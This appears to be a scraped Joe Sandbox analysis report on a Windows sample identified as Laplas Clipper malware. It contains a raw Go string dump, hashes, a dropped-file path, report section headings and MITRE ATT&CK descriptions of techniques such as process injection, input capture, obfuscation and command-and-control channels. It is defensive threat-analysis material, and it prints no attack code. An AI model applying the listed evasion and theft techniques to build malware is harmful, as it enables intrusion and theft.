Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_PNcznLwIMl.jbxd

Yara matches

Similarity

API ID:
String ID: m->p= max= min= next= p->m= prev= span=% util(...), i = , not , val .local.onion390625<-chanAcceptAnswerArabicAugustBasic BrahmiCANCELCarianChakmaCommonCookieCopticExpectFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLy$ p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad RequestClassHESIODCloseHandleCreateF$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br$releasep: m=remote errorruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptshort bufferspanSetSpinesweepWaiterstraceStringstransmitfileunexpected )unknown portwirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flushedWork id
API String ID: 0-2241517763
Opcode ID: 79d898dc659ba42dd8618e759383c1f9b62ccaae4d79689c2f13df296d38aa82
Instruction ID: 3398a6dde8fbd75b79657cbc87c49647842c40cd3a331f4d71b71db5c569ec6e
Opcode Fuzzy Hash: 79d898dc659ba42dd8618e759383c1f9b62ccaae4d79689c2f13df296d38aa82
Instruction Fuzzy Hash: 2C3116B45087408FD300EF25D19475ABBE0BF88318F05986EE88887312D778E888DFA6

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Ao88ZLN0Wi.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Laplas Clipper

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\jicTFBavsm\PNcznLwIMl.exe

\Device\Mup\computer\PIPE\samr

\Device\Null

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Windows Analysis Report
Ao88ZLN0Wi.exe

Function 02AE87C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 02AE8485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Function 02AECCA9 Relevance: .2, Instructions: 214
COMMON

Function 004344D0 Relevance: 11.4, Strings: 9, Instructions: 172
COMMON

Function 00444230 Relevance: 5.1, Strings: 4, Instructions: 81
COMMON

Function 02B6A7C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 02B6A485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Function 004344D0 Relevance: 11.4, Strings: 9, Instructions: 172
COMMON

Function 00444230 Relevance: 5.1, Strings: 4, Instructions: 81
COMMON